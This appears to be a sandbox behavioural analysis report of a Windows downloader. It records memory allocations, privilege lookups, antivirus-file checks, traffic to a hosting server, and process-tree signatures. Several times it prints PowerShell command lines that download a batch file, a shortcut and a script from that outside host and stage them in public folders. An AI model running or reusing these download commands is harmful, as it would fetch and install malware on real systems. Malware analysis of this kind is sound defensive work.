protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c45000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c4a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06c5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0261d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05836000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05837000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05838000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 5580
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x063a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 393216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc91000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0285a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02852000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02901000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02902000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 4220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0294a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\ProgramData\Microsoft Arts\Start\Dicord.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
Symantec ISB.Downloader!gen221
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received 
Data received F
Data received <html><head><title>400 Bad Request</title></head><body> <h2>HTTPS is required</h2> <p>This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.<br /> <blockquote>Hint: The URL should starts with <b>https</b>://</blockquote> </p> <hr /> Powered By LiteSpeed Web Server<br /> <a href='http://www.litespeedtech.com'><i>http://www.litespeedtech.com</i></a> </body></html>
Data received F<html><head><title>400 Bad Request</title></head><body> <h2>HTTPS is required</h2> <p>This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.<br /> <blockquote>Hint: The URL should starts with <b>https</b>://</blockquote> </p> <hr /> Powered By LiteSpeed Web Server<br /> <a href='http://www.litespeedtech.com'><i>http://www.litespeedtech.com</i></a> </body></html>
Data sent vr`ŽoâÖ´=–¤Ì+E¾¦‚v ¡÷?¦ºû•¯òà˜/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`ŽoâÁÐMíw߂€iŽ,-Ì»Ú)L|¢é$…q/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`ŽoãTPh¶¥ØŸmí_/oÞþ!I… yn½Y½/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`Žoãší¤xýbX߀’‚dSPÊÃ~Lç}·]l6/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`Žp]¡zuÖÖ4ÜûâA–×6P@8dŒÑ+Ö¼¿]ãúó/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`Žpö–>KÙR—c¯á6.w“k5€§,<Ïc¤/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`Žp/!?k±»âîáKï<.ìH¤`.+jæb«Uf/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`Žpyw•é´ôW ¼ N‡DF:)öæùÖÊ^¥#/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`Žpzä`v’—†›$\<#Å<;Ý5›ˆ]göa “/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Data sent vr`ŽpžÍägŽ‰)È$i,´Ä>ºŽ¿ ¨8]š˜fÑ/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
file C:\Program Files\Avast Software\Avast\AvastUI.exe
file C:\Program Files\AVG\Antivirus\AVGUI.exe
file C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
file C:\Users\Public\ss.vbs
Time & API Arguments Status Return Repeated

send

 buffer: vr`ŽoâÖ´=–¤Ì+E¾¦‚v ¡÷?¦ºû•¯òà˜/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1540
sent: 123
1 123 0

send

 buffer: vr`ŽoâÁÐMíw߂€iŽ,-Ì»Ú)L|¢é$…q/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1540
sent: 123
1 123 0

send

 buffer: vr`ŽoãTPh¶¥ØŸmí_/oÞþ!I… yn½Y½/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1264
sent: 123
1 123 0

send

 buffer: vr`Žoãší¤xýbX߀’‚dSPÊÃ~Lç}·]l6/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1264
sent: 123
1 123 0

send

 buffer: vr`Žp]¡zuÖÖ4ÜûâA–×6P@8dŒÑ+Ö¼¿]ãúó/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1424
sent: 123
1 123 0

send

 buffer: vr`Žpö–>KÙR—c¯á6.w“k5€§,<Ïc¤/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1424
sent: 123
1 123 0

send

 buffer: vr`Žp/!?k±»âîáKï<.ìH¤`.+jæb«Uf/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1452
sent: 123
1 123 0

send

 buffer: vr`Žpyw•é´ôW ¼ N‡DF:)öæùÖÊ^¥#/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1452
sent: 123
1 123 0

send

 buffer: vr`Žpzä`v’—†›$\<#Å<;Ý5›ˆ]göa “/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1452
sent: 123
1 123 0

send

 buffer: vr`ŽpžÍägŽ‰)È$i,´Ä>ºŽ¿ ¨8]š˜fÑ/5 ÀÀÀ À 281ÿnyc002.hawkhost.com  
socket: 1452
sent: 123
1 123 0
parent_process powershell.exe martian_process C:\Users\Public\ss.vbs
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
parent_process powershell.exe martian_process C:\ProgramData\Microsoft Arts\Start\Dicord.lnk
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
value Uses powershell to execute a file download from the command line
value Uses powershell to execute a file download from the command line
value Uses powershell to execute a file download from the command line
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe